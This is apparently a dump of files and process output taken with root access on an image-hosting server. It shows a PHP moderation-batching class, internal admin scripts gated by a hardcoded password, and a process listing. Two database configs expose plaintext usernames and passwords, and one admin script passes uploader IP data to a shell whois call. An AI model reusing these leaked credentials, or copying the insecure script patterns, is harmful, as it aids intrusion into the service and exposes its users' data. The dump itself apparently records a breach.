$file = $file[2] . '-' . $file[3] . '.' . $file[4];
// Skip malformed data
if(!preg_match("/\d+\-[\w'-]+\.[0-9a-zA-Z]{3}/", $file)) {contin
ue;}
$files [] = $file;
}
if (count($files) > 0) {
$this->modFiles = $files;
}
unset($files);
foreach($this->pornFiles as $file) {
// extract filename and server (ex: img614/1212/gxvjn.jpg)
$file = explode('/', $file);
$file = str_replace("img", "", $file[0]) . '-' . $file[2];
// Skip malformed data
if(!preg_match("/\d+\-[\w'-]+\.[0-9a-zA-Z]{3}/", $file)) {contin
ue;}
$files [] = $file;
}
if (count($files) > 0 ) {
$this->pornFiles = $files;
}
// remove any porn files from mod list
$this->modFiles = array_diff($this->modFiles, $this->pornFiles);
if(count($this->modFiles) > 1 || count($this->pornFiles) > 1) {
return true;
} else {
return false;
}
}
/**
* Splt into multi part if over max limit
*/
private function splitBatches($file, $type = "mod")
{
$count = count($file);
if ($count > 0)
{
$i = 0;
$batch = 0;
do
{
if ($type == "porn")
{
$this->pornBatches[$i] = array_slice($file, $batch, self:
:MAX_FILES);
}
else
{
$this->modBatches[$i] = array_slice($file, $batch, self::
MAX_FILES);
}
$i++;
$batch = self::MAX_FILES * $i;
}
while ($batch < $count);
}
}
private function generateUrls()
{
$flag = 1;
foreach($this->modBatches as $index => $batch)
{
foreach($batch as $index2 => $file)
{
if (trim($file))
{
$output [$index2] ['row_key'] = $file;
$output [$index2] ['mod_id'] = $flag;
}
}
if ($output)
{
$this->jsonData [] = array("type" => "mod", "post" => json_e
ncode($output), "count" => count($output));
}
unset($output);
}
$flag = 666;
foreach($this->pornBatches as $index => $batch)
{
foreach($batch as $index2 => $file)
{
if (trim($file))
{
$output [$index2] ['row_key'] = $file;
$output [$index2] ['mod_id'] = $flag;
}
}
if ($output)
{
$this->jsonData [] = array("type" => "porn", "post" => json_
encode($output), "count" => count($output));
}
unset($output);
}
}
private function multiInsert()
{
if (count($this->jsonData) > 0)
{
foreach ($this->jsonData as $data)
{
echo "Processing " . $data['count'] . " " . $data['type'] .
" files: ";
if ($response = $this->javaAPI($data) != 200)
{
// Send back for reprocessing
error_log("[ HBASE2 QUERY ERROR ] url: $url response: $r
esponse");
$this->sendBack($data);
echo "FAILED - Sending back to queue\n";
} else {
echo "PASS\n";
}
}
}
}
private function sendBack($data)
{
$json = json_decode($data['post'], true);
foreach($json as $value)
{
$files [] = $value['row_key'];
}
$files = implode("\n", $files) . "\n";
if ($data['type'] == 'mod')
{
file_put_contents(self::HBASE_MODERATED_QUEUE, $files, FILE_APPE
ND);
}
else
{
file_put_contents(self::HBASE_PORN_QUEUE, $files, FILE_APPEND);
}
}
private function javaAPI($jsonData)
{
// if we have another url to get
if ($jsonData) {
// new curl handle
$ch = curl_init();
// Create url
if ($jsonData['type'] == "porn")
{
$overRide = "true";
}
else
{
$overRide = self::OVERRIDE;
}
$url = self::API_URL . "?update=" . $overRide;
$post = $jsonData['post'];
//$post = gzcompress($jsonData['post'], 6);
// set the url
curl_setopt( $ch, CURLOPT_URL, $url);
curl_setopt( $ch, CURLOPT_TIMEOUT, CURL_TIMEOUT );
curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, CURL_CONNECT_TIMEOUT )
;
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLINFO_HTTP_CODE, true );
curl_setopt( $ch, CURLOPT_HTTPHEADER, array("Content-type: appli
cation/json"));
curl_setopt( $ch, CURLOPT_POSTFIELDS, $post);
curl_setopt( $ch, CURLOPT_ENCODING, "gzip");
$content = curl_exec($ch);
$response = curl_getinfo( $ch, CURLINFO_HTTP_CODE );
return $response;
}
}
}
?>
# cat /home/image/www/cwho.php
<pre>
<?php
/*
-rw-r--r-- 1 apache apache 27777 2008-02-01 05:29 resahinamelioe5.jpg
-rw-r--r-- 1 apache apache 3873 2008-02-01 05:29 resahinamelioe5.th.jpg
-rw-r--r-- 1 apache apache 13 2008-02-01 05:29 resahinamelioe5.cfg.ip
-rw-r--r-- 1 apache apache 34 2008-02-01 05:29 resahinamelioe5.cfg
-rw-r--r-- 1 apache apache 610 2008-02-01 05:29 resahinamelioe5.7c667f85
db.xml
*/
if($pass != "kotik"){ exit; }
list($loc,$dir,$image) = explode("/",$file);
list($name,$ext) = explode (".",$image);
$url = "http://$loc.imageshack.us/$file";
$ip = escapeshellarg(trim(@file_get_contents("/home/image/www/$loc/$dir/$nam
e.cfg.ip")));
$date = date("F d Y H:i:s", filemtime("/home/image/www/".$file));
echo "Fast Deletion: <input value=\"ssh root@$loc rm -i /home/image/www/$loc
/$dir/$name*\" type=\"text\" size=\"90\" />\n\n";
echo "The file has been deleted. ImageShack has collected the following info
rmation about this uploaded file:
url image location:\t$url
ip address of uploader:\t$ip
date of file upload:\t$date
A whois of the IP address yields the following results:\n\n";
system("whois $ip");
?>
</pre>
# cat /home/image/www/unbanwrite.php
<?php
$file = escapeshellcmd($file);
if($pass != "kotik" || !file_exists("/home/image/www/$file.ban")) { exit; }
if(!eregi("\.\.",$file)){
copy("/home/image/www/$file","/home/image/www/$file.safe");
unlink("/home/image/www/$file");
copy("/home/image/www/$file.ban","/home/image/www/$file");
unlink("/home/image/www/$file.ban");
echo "finished unbanning $file";
}
?>
# cat /home/image/www/db_connect_stream.php
<?
$mysql_hostname = "img551.imageshack.us";
$mysql_user = "redroach";
$mysql_password = "iabmeclttc";
$mysql_database = "image_tracking";
// connect to the database
$bd = mysql_connect($mysql_hostname, $mysql_user, $mysql_password);
mysql_select_db($mysql_database, $bd);
?>
# cat /home/image/www/blog/imageshack/wp-config.php
drwxr-xr-x 5 image image 4096 Jun 24 2010 ..
-rw-r--r-- 1 apache apache 2516356 Jun 5 2010 latest.zip.2
-rw-r--r-- 1 apache apache 2357045 Jun 4 2010 latest.zip.1
<?php
// ** MySQL settings ** //
define('DB_NAME', 'imageshack_blog'); // The name of the database
define('DB_USER', 'wpuser'); // Your MySQL username
define('DB_PASSWORD', 'wp4nab2'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change th
is value
define('WP_SITEURL', 'http://stream.imageshack.us/blog/imageshack');
define('WP_HOME', 'http://stream.imageshack.us/blog/imageshack');
// You can have multiple installations in one database if you give each a un
ique prefix
$table_prefix = 'wp_'; // Only numbers, letters, and underscores please!
// Change this to localize WordPress. A corresponding MO file for the
// chosen language must be installed to wp-includes/languages.
// For example, install de.mo to wp-includes/languages and set WPLANG to 'de
'
// to enable German language support.
define ('WPLANG', '');
/* That's all, stop editing! Happy blogging. */
define('ABSPATH', dirname(__FILE__).'/');
require_once(ABSPATH.'wp-settings.php');
?>
# ps auxwwf|grep -v nginx
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 2 0.0 0.0 0 0 ? S< Jan06 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< Jan06 24:08 \_ [migrat
ion/0]
root 4 0.0 0.0 0 0 ? S< Jan06 48:08 \_ [ksofti
rqd/0]
root 5 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [watchd
og/0]
root 6 0.0 0.0 0 0 ? S< Jan06 26:09 \_ [migrat
ion/1]
root 7 0.0 0.0 0 0 ? S< Jan06 55:58 \_ [ksofti
rqd/1]
root 8 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [watchd
og/1]
root 9 0.0 0.0 0 0 ? S< Jan06 8:30 \_ [migrat
ion/2]
root 10 0.0 0.0 0 0 ? S< Jan06 63:16 \_ [ksofti
rqd/2]
root 11 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [watchd
og/2]
root 12 0.0 0.0 0 0 ? S< Jan06 10:14 \_ [migrat
ion/3]
root 13 0.0 0.0 0 0 ? S< Jan06 204:24 \_ [ksofti
rqd/3]
root 14 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [watchd
og/3]
root 15 0.0 0.0 0 0 ? S< Jan06 4:24 \_ [events
/0]
root 16 0.0 0.0 0 0 ? S< Jan06 24:03 \_ [events
/1]
root 17 0.0 0.0 0 0 ? S< Jan06 1:19 \_ [events
/2]
root 18 0.0 0.0 0 0 ? S< Jan06 50:15 \_ [events
/3]
root 19 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [khelpe
r]
root 90 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kinteg
rityd/0]
root 91 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kinteg
rityd/1]
root 92 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kinteg
rityd/2]
root 93 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kinteg
rityd/3]
root 95 0.0 0.0 0 0 ? S< Jan06 0:01 \_ [kblock
d/0]
root 96 0.0 0.0 0 0 ? S< Jan06 0:01 \_ [kblock
d/1]
root 97 0.0 0.0 0 0 ? S< Jan06 0:02 \_ [kblock
d/2]
root 98 0.0 0.0 0 0 ? S< Jan06 1:05 \_ [kblock
d/3]
root 100 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kacpid
]
root 101 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kacpi_
notify]
root 184 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [cqueue
]
root 188 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [ata/0]
root 189 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [ata/1]
root 190 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [ata/2]
root 191 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [ata/3]
root 192 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [ata_au
x]
root 194 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [ksuspe
nd_usbd]
root 199 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [khubd]
root 202 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kserio
d]
root 272 0.0 0.0 0 0 ? S< Jan06 48:35 \_ [kswapd
0]
root 319 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [aio/0]
root 320 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [aio/1]
root 321 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [aio/2]
root 322 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [aio/3]
root 509 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [scsi_e
h_0]
root 512 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [scsi_e
h_1]
root 534 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [scsi_e
h_2]
root 537 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [scsi_e
h_3]
root 606 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kpsmou
sed]
root 613 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kstrip
ed]
root 616 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [ksnapd
]
root 645 0.0 0.0 0 0 ? S< Jan06 43:22 \_ [kjourn
ald]
root 1355 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kaudit
d]
root 1377 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kmpath
d/0]
root 1378 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kmpath
d/1]
root 1379 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kmpath
d/2]
root 1380 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kmpath
d/3]
root 1381 0.0 0.0 0 0 ? S< Jan06 0:00 \_ [kmpath
_handlerd]
root 1403 0.0 0.0 0 0 ? S< Jan06 26:17 \_ [kjourn
ald]
root 1553 0.0 0.0 0 0 ? S< Jan06 55:00 \_ [kondem
and/0]
root 1554 0.0 0.0 0 0 ? S< Jan06 49:08 \_ [kondem
and/1]
root 1555 0.0 0.0 0 0 ? S< Jan06 46:26 \_ [kondem
and/2]
root 1556 0.0 0.0 0 0 ? S< Jan06 70:47 \_ [kondem
and/3]
root 468 0.0 0.0 0 0 ? S May18 5:01 \_ [pdflus
h]
root 23069 0.0 0.0 0 0 ? S Jul07 2:28 \_ [pdflus
h]
root 1 0.0 0.0 4080 460 ? Ss Jan06 11:41 /sbin/init
root 690 0.0 0.0 10448 4 ? S<s Jan06 0:00 /sbin/udevd
-d
root 1802 0.0 0.0 6880 312 ? Ss Jan06 30:24 irqbalance
dbus 1814 0.0 0.0 19140 580 ? Ss Jan06 0:00 dbus-daemon
--system
root 1839 0.0 0.0 3932 4 ? Ss Jan06 0:00 /usr/sbin/a
cpid
root 1852 0.0 0.0 171156 1236 ? S Jan06 48:56 /usr/sbin/s
nmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid -a
root 1862 0.0 0.0 58816 336 ? Ss Jan06 0:00 /usr/sbin/s
shd
root 22174 0.0 0.0 90332 3432 ? Ss Jul02 0:00 \_ sshd: e
dwin [priv]
edwin 22181 0.0 0.0 90480 2224 ? S Jul02 1:42 \_ ssh
d: edwin@pts/0
edwin 22182 0.0 0.0 89952 1760 pts/0 Ss Jul02 0:00 \_
-bash
root 22220 0.0 0.0 124600 1432 pts/0 S Jul02 0:00
\_ su -
root 22221 0.0 0.0 90088 1984 pts/0 S Jul02 0:00
\_ -bash
root 4300 0.3 0.0 15004 1480 pts/0 S+ Aug16 35:16
\_ top
root 2113 0.0 0.0 66768 728 ? Ss Jan06 5:06 sendmail: a
ccepting connections
smmsp 2121 0.0 0.0 58372 372 ? Ss Jan06 0:01 sendmail: Q
ueue runner@01:00:00 for /var/spool/clientmqueue
root 2133 0.0 0.0 6592 32 ? Ss Jan06 0:00 /usr/sbin/g
pm -m /dev/input/mice -t exps2
root 2179 0.0 0.0 16572 52 ? Ss Jan06 0:00 /usr/sbin/a
td
root 2236 0.0 0.0 3920 8 tty4 Ss+ Jan06 0:00 /sbin/minge
tty tty4
root 2237 0.0 0.0 3920 8 tty5 Ss+ Jan06 0:00 /sbin/minge
tty tty5
root 2238 0.0 0.0 3920 8 tty2 Ss+ Jan06 0:00 /sbin/minge
tty tty2
root 2239 0.0 0.0 3920 8 tty3 Ss+ Jan06 0:00 /sbin/minge
tty tty3
root 2241 0.0 0.0 3920 8 tty6 Ss+ Jan06 0:00 /sbin/minge
tty tty6
gmond 5109 0.0 0.0 124252 2288 ? Ss May22 15:43 /usr/sbin/g
mond
apache 6201 1.0 0.4 59840 40536 ? Ss Jun11 1126:30 /usr/local
/sbin/haproxy -f /etc/haproxy/haproxy.cfg -sf 2144
root 2268 0.0 0.0 182920 1476 ? Sl Jun11 1:35 rsyslogd -c
3 -i /var/run/rsyslogd.pid
root 8295 0.0 0.0 19496 956 ? Ss Jun13 0:00 xinetd -sta
yalive -pidfile /var/run/xinetd.pid
image 25874 0.1 1.5 316108 125464 ? S Jun25 87:44 /usr/local/
bin/multi-php /home/image/crons_stream/bin/InsertIntoHbase.php
root 20841 0.0 0.0 30820 908 ? S Jul03 0:00 supervising
syslog-ng
root 20842 0.3 5.3 469428 439808 ? Ss Jul03 292:09 \_ /opt/sy
slog-ng/sbin/syslog-ng --no-caps --cfgfile=/opt/syslog-ng/etc/syslog-ng.conf
apache 29544 0.0 0.0 217588 7680 ? Ss Jul03 13:27 /usr/local/
bin/php-cgi
apache 8682 0.0 0.1 222804 9804 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 8720 0.0 0.1 222804 9716 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 8839 0.0 0.1 222804 9860 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 8960 0.0 0.1 222804 9908 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9093 0.0 0.1 222804 9876 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9116 0.0 0.1 222804 9856 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9140 0.0 0.1 222804 9820 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9149 0.0 0.1 222804 9708 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9158 0.0 0.1 222804 9872 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9467 0.0 0.1 222804 9796 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9514 0.0 0.1 222804 9668 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9567 0.0 0.1 222804 9732 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9713 0.0 0.1 222804 9792 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9758 0.0 0.1 222804 9820 ? S 14:45 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 9999 0.0 0.1 222804 9840 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10010 0.0 0.1 222804 9852 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10112 0.0 0.1 222804 9844 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10151 0.0 0.1 222804 9716 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10166 0.0 0.1 222804 9596 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10196 0.0 0.1 222804 9692 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10247 0.0 0.1 222804 9772 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10283 0.0 0.1 222804 9376 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10329 0.0 0.1 222804 9836 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10353 0.0 0.1 222804 9720 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10466 0.0 0.1 222804 9704 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10506 0.0 0.1 222804 9664 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10625 0.0 0.1 222804 9576 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10650 0.0 0.1 222804 9964 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10675 0.0 0.1 222804 9700 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10742 0.0 0.1 222804 9632 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10850 0.0 0.1 222804 9620 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10876 0.0 0.1 222804 9788 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 10935 0.0 0.1 222804 9620 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11002 0.0 0.1 222804 9564 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11036 0.0 0.1 222804 9620 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11058 0.0 0.1 222804 9908 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11080 0.0 0.1 222804 9756 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11103 0.0 0.1 222804 9980 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11135 0.0 0.1 222804 9584 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11143 0.0 0.1 222804 9640 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11183 0.0 0.1 222804 9808 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11185 0.0 0.1 222804 9696 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11212 0.0 0.1 222804 9640 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11227 0.0 0.1 222804 9584 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11279 0.0 0.1 222804 9752 ? S 14:46 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11469 0.0 0.1 222804 9584 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11499 0.0 0.1 222804 9752 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11921 0.0 0.1 220700 8328 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 11977 0.0 0.1 222804 9608 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12114 0.0 0.1 222804 9620 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12136 0.0 0.1 222804 9624 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12143 0.0 0.1 222804 9572 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12201 0.0 0.1 222804 9440 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12241 0.0 0.1 222804 9620 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12317 0.0 0.1 222804 9440 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12322 0.0 0.1 220700 8424 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12371 0.0 0.1 222804 9588 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12380 0.0 0.1 222804 9788 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12400 0.0 0.1 222804 9624 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12430 0.0 0.1 222804 9624 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12463 0.1 0.1 222804 10140 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12488 0.1 0.1 222804 9648 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12539 0.0 0.1 222804 9588 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12580 0.0 0.1 222804 9584 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12708 0.0 0.1 222804 9524 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12750 0.0 0.1 222804 9544 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12767 0.0 0.1 222804 9380 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12836 0.0 0.1 222804 9356 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12890 0.0 0.1 222804 9536 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 12893 0.0 0.1 222804 9716 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13009 0.0 0.1 222804 9768 ? S 14:47 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13258 0.0 0.1 222804 9560 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13325 0.0 0.1 222804 9500 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13329 0.0 0.1 222804 9560 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13422 0.0 0.1 220700 8200 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13431 0.0 0.1 222804 9536 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13537 0.0 0.1 222804 9556 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13725 0.0 0.1 220700 8208 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13761 0.0 0.1 220700 8424 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13810 0.0 0.1 222804 9548 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13830 0.0 0.1 222804 9608 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13837 0.0 0.1 222804 9476 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13891 0.0 0.1 222804 9536 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13955 0.0 0.1 220700 8236 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13974 0.0 0.1 222804 8980 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 13994 0.0 0.0 219660 6320 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14074 0.0 0.1 222804 9208 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14076 0.0 0.1 222804 9716 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14095 0.0 0.1 220700 8324 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14119 0.0 0.1 222804 9572 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14129 0.0 0.1 220700 8248 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14400 0.0 0.1 220700 8260 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14403 0.0 0.1 222804 9220 ? S 14:48 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14797 0.0 0.0 219660 6200 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14818 0.0 0.1 220700 8220 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14940 0.0 0.1 222804 9228 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14979 0.0 0.0 219660 6160 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14997 0.0 0.1 220700 8468 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 14999 0.0 0.1 222804 9580 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15033 0.0 0.0 219660 6164 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15035 0.0 0.1 222804 9368 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15051 0.0 0.0 219660 6184 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15060 0.0 0.1 220700 8424 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15266 0.0 0.1 220700 8228 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15273 0.0 0.1 220700 8384 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15294 0.0 0.1 220700 8892 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15475 0.0 0.0 219660 6176 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15640 0.0 0.1 220700 8288 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15645 0.0 0.0 219660 6412 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15678 0.0 0.1 222804 9456 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15771 0.0 0.1 222804 9460 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15772 0.0 0.0 219660 6156 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 15920 0.0 0.0 219660 5920 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16087 0.0 0.0 219660 6132 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16109 0.0 0.0 219660 6152 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16151 0.0 0.0 219660 6156 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16167 0.0 0.0 220700 8188 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16185 0.0 0.0 219660 5908 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16208 0.0 0.0 220700 8192 ? S 14:49 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16502 0.0 0.0 219660 6156 ? S 14:50 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16575 0.0 0.0 219660 5908 ? S 14:50 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16584 0.0 0.0 219660 6156 ? S 14:50 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16690 0.0 0.0 219660 6124 ? S 14:50 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16695 0.0 0.0 219660 6124 ? S 14:50 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16735 0.0 0.0 219660 5976 ? S 14:50 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16795 0.0 0.0 220700 8120 ? S 14:50 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16820 0.0 0.0 219660 5816 ? S 14:50 0:00 \_ /usr/lo
cal/bin/php-cgi
apache 16850 0.0 0.0 217588 4704 ? S 14:50 0:00 \_ /usr/lo
cal/bin/php-cgi
image 29538 0.8 0.1 197748 11124 ? S Aug05 215:48 /usr/local/
bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDeletio
n.php
image 30999 0.5 0.1 208524 16196 ? S 14:39 0:03 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 1479 0.7 0.2 210060 17388 ? S 14:41 0:03 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 1561 0.7 0.2 212364 19756 ? S 14:41 0:04 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 5329 0.6 0.1 205452 13240 ? S 14:43 0:02 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 8175 0.6 0.1 205452 13324 ? S 14:45 0:02 \_ /usr/lo
